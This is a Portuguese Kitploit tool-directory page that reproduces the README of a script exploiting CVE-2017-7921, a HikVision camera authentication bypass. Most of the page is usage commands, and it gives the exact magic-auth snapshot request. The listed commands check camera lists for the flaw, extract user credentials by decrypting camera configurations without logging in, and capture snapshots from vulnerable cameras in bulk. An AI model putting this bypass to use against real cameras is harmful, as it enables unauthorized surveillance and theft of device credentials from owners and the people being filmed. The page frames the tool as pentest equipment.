Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/mverschu/cve-2017-7921
ReconhecimentoSegurança IoTAtaques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesAutenticação
GitHubmverschu/cve-2017-7921

CVE-2017-7921

Bypass de Autenticação HikVision CVE, ferramenta capaz de extrair credenciais e tirar snapshots com base em magic cookie ou credenciais fornecidas.

Ver Repositório
há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
CVE-2017-7921 — Bypass de Autenticação HikVision CVE, ferramenta capaz de extrair credenciais e tirar snapshots com base em magic cookie ou credenciais fornecidas. | Kitploit

Ferramenta de Listagem e Captura de Snapshot de Câmeras Hikvision

Ferramenta autônoma para listar câmeras Hikvision a partir de um arquivo e capturar um snapshot de cada uma usando credenciais válidas (autenticação HTTP Basic ou Digest) ou o bypass de autenticação por CVE. Projetada para ser executada em outro host para testes.

Recursos

  • Listar câmeras a partir de um arquivo de texto (um host ou host:porta por linha).
  • Verificar (CVE) – testar cada câmera para o bypass mágico de autenticação da CVE (sem credenciais); --save-snapshot opcional para dispositivos vulneráveis.
  • Credenciais – extrair usuário/senha de cada câmera via CVE (autenticação mágica + descriptografia de configuração). Requer OpenSSL.
  • Verificação de autenticação – confirmar que o nome de usuário/senha é aceito por cada câmera (nenhum snapshot é salvo).
  • Snapshot de todas – obtém uma imagem por câmera (credenciais válidas ou --exploit para usar o bypass da CVE sem credenciais).
  • Requisições concorrentes (workers configuráveis).
  • Autenticação HTTP Digest opcional; --merge opcional para montar uma imagem de visão geral. Dependências: requests, Pillow (para --merge).

Requisitos

  • Python 3.8+
  • requests

Instalação

root@kitploit:~
pip install -r requirements.txt

Arquivo de lista de câmeras

Crie um arquivo de texto com uma câmera por linha. Comentários com # são ignorados.

root@kitploit:~
# Exemplo cameras.txt
192.168.1.100
192.168.1.101:80
nvr.local:8080

Uso

Listar câmeras

Exibe as câmeras lidas do arquivo (nenhuma credencial necessária).

root@kitploit:~
python hikvision_snapshots.py cameras.txt list

Verificação de alcance opcional (HTTP GET para cada host):

root@kitploit:~
python hikvision_snapshots.py cameras.txt list -v

Verificar (CVE)

Testa cada câmera para a CVE de bypass de autenticação de snapshot da Hikvision. Nenhuma credencial é necessária.

root@kitploit:~
python hikvision_snapshots.py cameras.txt check

Salva snapshots apenas para câmeras vulneráveis:

root@kitploit:~
python hikvision_snapshots.py cameras.txt check --save-snapshot -o ./vuln_snapshots

Opções: --timeout, --workers, -o (para --save-snapshot).

Credenciais (extrair)

Extrai credenciais de cada câmera via CVE (autenticação mágica para obter a lista de usuários e o arquivo de configuração e, em seguida, descriptografar a configuração). Requer OpenSSL no host. Nenhuma credencial é necessária para executar.

root@kitploit:~
python hikvision_snapshots.py cameras.txt credentials

Opções: --timeout, --workers.

Verificação de autenticação

Confirma se suas credenciais funcionam em cada câmera (usa os mesmos endpoints de snapshot; não salva imagens).

root@kitploit:~
python hikvision_snapshots.py cameras.txt auth-check -u admin -p YourPassword

Opções: --timeout, --workers, --digest (igual ao snapshot).

Snapshot de todas as câmeras

Captura um snapshot por câmera e salva como JPEG. Use credenciais válidas ou --exploit (bypass de autenticação por CVE, sem credenciais).

root@kitploit:~
# Com credenciais
python hikvision_snapshots.py cameras.txt snapshot -u admin -p YourPassword

# Com exploit CVE (sem credenciais)
python hikvision_snapshots.py cameras.txt snapshot --exploit
  • Os snapshots são salvos em snapshots/ por padrão (use -o para alterar).
  • Os nomes dos arquivos são derivados de host ou host_port (ex.: 192_168_1_100.jpg, nvr_local_8080.jpg).

Opções:

Com --merge, após salvar cada snapshot a ferramenta cria uma única imagem em grade (overview.jpg) no diretório de saída, com uma célula por câmera e um rótulo. Requer Pillow (pip install Pillow).

Exemplo com saída personalizada e autenticação Digest:

root@kitploit:~
python hikvision_snapshots.py cameras.txt snapshot -u admin -p secret -o ./images --digest --timeout 20

Exemplo com visão geral mesclada:

root@kitploit:~
python hikvision_snapshots.py cameras.txt snapshot -u admin -p YourPassword --merge
# ou com exploit (sem credenciais):
python hikvision_snapshots.py cameras.txt snapshot --exploit --merge -o ./out

Endpoints

Snapshot autenticado (com credenciais): o script tenta, em ordem – /ISAPI/Streaming/channels/1/picture, /ISAPI/Streaming/channels/101/picture, /onvif-http/snapshot.

CVE (check / --exploit): /onvif-http/snapshot?auth=YWRtaW46MTEK (bypass mágico de autenticação, sem credenciais).

Execução em outro host

  1. Copie hikvision_snapshots.py, requirements.txt e seu arquivo de lista de câmeras para o host.
  2. Instale: pip install -r requirements.txt
  3. Execute list para verificar o arquivo; use check para a CVE, auth-check para credenciais ou snapshot (com -u/-p ou --exploit).

Garanta que o host tenha acesso de rede a todos os IPs e portas das câmeras.

Baixar ferramenta
OpçãoDescriçãoPadrão
-u, --usernameNome de usuário da câmeraobrigatório, exceto com --exploit
-p, --passwordSenha da câmeraobrigatório, exceto com --exploit
--exploitUsa o bypass mágico de autenticação da CVE (sem credenciais)desativado
-o, --output-dirDiretório para as imagens de snapshotsnapshots
--timeoutTempo limite HTTP em segundos15
--workersNúmero de requisições de snapshot concorrentes10
--digestUsa autenticação HTTP Digest em vez de Basicdesativado
--mergeMescla todos os snapshots em uma única imagem de visão geraldesativado
--merge-columnsColunas da grade para mesclagem (padrão: automático)automático